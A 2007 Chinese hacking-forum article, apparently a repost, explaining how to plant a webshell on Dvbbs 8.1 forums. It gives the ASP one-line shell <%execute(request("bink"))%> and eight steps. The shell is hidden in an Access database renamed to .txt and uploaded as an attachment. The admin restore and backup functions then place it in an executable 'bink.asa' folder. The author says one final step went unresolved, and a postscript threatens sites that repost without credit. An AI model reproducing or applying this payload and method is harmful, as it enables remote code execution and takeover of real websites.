|
|
 |
| Let me tell you how to get Dvbbs 8.1 webshell |
| 作者:Bink [Bink Team CEO] 来源:邪恶八进制信息安全团队 发布时间:2007-11-30 10:08:48 发布人:黑客动画吧 |
 减小字体  增大字体
前言:
我醒了,喝多了,死 hackest !
话说刚到黑X没几天,有天鱼过来玩,一过来话没说两句鱼就跟hackest在那里折腾洞网,我继续在旁边玩,若干时间后他们两人还在搞,我忍不住了!我要看!随后溜达过去看了看,貌似他们那里没啥进展,正好过去hackest说数据库备份的数据库文件地址无法修改,我看了下原来是HTML的<input>元素中加入了某参数禁止编辑而已,牛逼轰轰的把hackest踢飞后直接Down了该页面的HTML打开,把 From 部分单独复制下来新建文本文件保存,并且删除禁止修改的input项上的控制属性后使得该输入项可修改,然后他们又继续折腾了...到最后还是没有结果,最后就引发了hackest在邪八技术讨论区的那个话题[详见 https://forum.eviloctal.com/read-htm-tid-31465.html ],在此我很遗憾的说:“那天我没仔细看代码,犯了个严重的错误,那天及随后在技术讨论贴里提到的方法完全是错误的。”
但是!我那么帅,那么可爱,那么乖...[Delete 520 Bytes] 在瞄过代码后仍然找到了漏洞,再一个但是!因为本人现在使用的机器条件不允许,测试起来麻烦,就忍受着鼠标一个点击都需要等待10秒来返回侦的情况下远程在鱼的电脑上进行了一系列的测试,最后因为某问题卡住后老是K不掉,但个人认为这个问题应该不是难点了,所以就放弃。现在把利用方法发出来,最后的那个难题让你们自己来解决,应该不是很难了,如果实在没有解决掉,那还是我来吧,哈哈。
正文:
在 hackest 的讨论贴中我提到:可以直接本地建立一个数据库“bink.mdb”,然后再依次创建表“bink”、字段“bink”,最后在字段“bink”中输入“<%execute(request("bink"))%>”保存后将数据库“bink.mdb”改名为“bink.txt”上传到目标站点,然后通过备份功能那里,将备份操作页面的代码保存为HTML格式,删除第一项输入框的禁止编辑属性后在那里输入该次上传的“bink.txt”文件在站点上的相对位置进行备份到“bink.asa/bak_20071130232515.mdb”即可。但是,这个方法很多朋友测试说不行,说备份后的mdb文件仍然存在“<% loop <%” 这个东西,更有甚者言:“动网数据库备份时会加入动网数据库的框架”,ORZ,麻烦不会看代码的同志么要下此断言,加入数据库框架?怎么加?我都不会。我再次详细的检查备份部分的代码,确实没有对数据库文件进行处理的说。
其实最后才发现,原来当前数据库文件的位置虽然在备份页面给出,并且也有一个 input 属性可以设置,并且我们删除了不可编辑属性使之可以编辑提交,但是,DV在进行备份处理时,当前数据库文件的位置并没不是获得表单的提交,而是直接读取了系统设置中的数据库位置,那么就是说,这个漏洞是不存在滴,我们传了自己的库上去,再本地改HTML进行备份,最后备份的数据库依然是他的系统数据库,而不是我们的,难怪我说会出现什么额外符号。
不过话又说回来了,动网始终是动网,Bink 始终是 Bink [觉得恶心的可以去吐了,灭哈哈哈],虽然上面那个方法不行,但是衍生出了另一个方法:[同志们,激动的时刻来临了]
一、本地建立数据库“Bink.mdb”
二、在数据库“Bink.mdb”中创建表“Bink”,并在表“Bink”中建立字段“Bink”,类型为文本型,属性默认。
三、在字段“Bink”中输入“<<%execute(request("bink"))%>>”。[这里为何这样?请看文章最后的注解]
四、保存并修改数据库文件名称为“Bink.txt”
五、前台论坛发新贴,并且上传该文件。
六、后台上传文件管理中找到最新上传的该文件地址,如“../UploadFile/2007-11/20071130015024861.txt”
七、打开数据库恢复功能,在备份文件位置处输入“../UploadFile/2007-11/20071130015024861.txt”并执行操作。
八、打开数据库备份功能,修改备份文件夹名为“bink.asa”,填写备份数据库名称为“bink.mdb”。
好了,你得到了一个地址为 http://www.xxx.com/bink.asa/bink.mdb 的 Webshell。
[吾欲战汝亲娘,一个死机这里丢失了上百字的东西,还要重新敲,倒啊!人懒,简单写几句睡了。]
我遇到的问题是自己建立的数据库在创建时、传到服务器后都可以用Access正常打开,但一执行数据库恢复的操作后,恢复后的数据库文件无法打开,出现数据库损坏提示,三次打开的数据库文件大小字节一样,在文件恢复的代码处没有任何对备份文件进行操作的代码,相反,在 FSO.FileCopy 的前一句就是创建新的数据库引擎连接我们要备份的txt文件来验证是否为数据库文件,验证通过后才进行的Filecopy 操作。怪就怪在这点上面,我用DV的数据库进行数据库恢复操作后,恢复后的数据库却可以打开,大家都是数据库,为虾米呢?难道是 txt 文件用 filecopy 为mdb 后就出现问题了? 估计有可能吧。不清楚,我搞到这里卡住后就有事闪人了,现在没心思弄它了,谁有兴趣的把这个问题搞定就可以了,总的来说这个问题不难,自己写个 text.conn.asp 文件进行一些数据库文件的 FileCopy 测试即可,如果是在搞不定,最终还是我来弄吧。
注解:
操作步骤三中输入“<<%execute(request("bink"))%>>”是因为本人发现在新建数据库中输入“<%execute(request("bink"))%>”后用记事本[很万恶,话说本人长期用记事本打开EXE及DLL文件看着玩]打开后发现该段代码会变成“?%execute(request("bink"))%>”,因此特多加了两个前后尖括号,这样一来就会变成我们想要的“?<%execute(request("bink"))%>>”格式。
PS:故意写英文标题免得有不法份子通过搜索引擎找8.1的洞,如果本人发现网络上在本文之后有人转载此文不保留版权出处的,小心你的站点成为我们几个职业叉叉无聊时的“目标”,谢谢配合!
PS2:对本文中有不清楚的或者怀疑的地方尽管回复提问,以上所有操作已经在鱼的电脑上进行过了,并且得到了证实。
|
|
| [
]
[返回上一页]
[打 印]
[收 藏] |
|
|
|
|
|
![]() |
|
设为首页
加入收藏
发布作品
栏目导航